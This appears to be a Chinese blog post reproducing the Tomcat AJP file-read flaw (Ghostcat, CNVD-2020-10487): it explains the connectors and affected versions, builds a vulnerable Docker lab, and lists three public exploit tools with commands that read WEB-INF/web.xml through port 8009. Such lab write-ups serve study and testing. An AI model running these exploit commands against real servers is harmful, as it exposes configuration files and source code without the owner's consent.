Tomcat AJP协议文件读取漏洞

漏洞描述:

Tomcat在 server.xml中配置了两种连接器:

1.HTTP Connector:监听8080端口,负责建立HTTP连接。在通过浏览器访问Tomcat服务器的Web应用时,使用的就是这个连接器。

2.AJP Connector:监听8009端口,负责和其他的HTTP服务器建立连接,通过AJP协议和另一个Web容器进行交互。

漏洞利用条件:

Tomcat服务器8009端口上的AJP协议存在漏洞,攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp配置文件或源代码等

漏洞影响范围:

Apache Tomcat 6

Apache Tomcat 7 < 7.0.100

Apache Tomcat 8 < 8.5.51

Apache Tomcat 9 < 9.0.31

漏洞复现:

靶场的搭建:

1、Docker部署环境,搜索受影响的tomcat镜像

~# docker search tomcat-8.5

~# docker pull duonghuuphuc/tomcat-8.5.32

2、拉取完成后运行,并通过浏览器访问:

~# docker run -d -p 8080:8080 -p 8009:8009 duonghuuphuc/tomcat-8.5.32 

 3、漏洞利用:

EXP1:AjpShooter:git clone https://github.com/00theway/Ghostcat-CNVD-2020-10487.git

                                  python  ajpShooter.py  http://<靶场IP> 8009 WEB-INF/web.xml read

 

EXP2:Ghostcat:git clone git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi 

python  CNVD-2020-10487-Tomcat-Ajp-lfi.py  <目标ip>  -p <ajp端口>  -f  <读取文件>

EXP3:AJPy:git clone https://github.com/hypn0s/AJPy

 版本探测:python tomcat.py --port <port> version <IP>

 文件读取:python tomcat.py read_file --webapp=manager /WEB-INF/web.xml <地址>

 

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值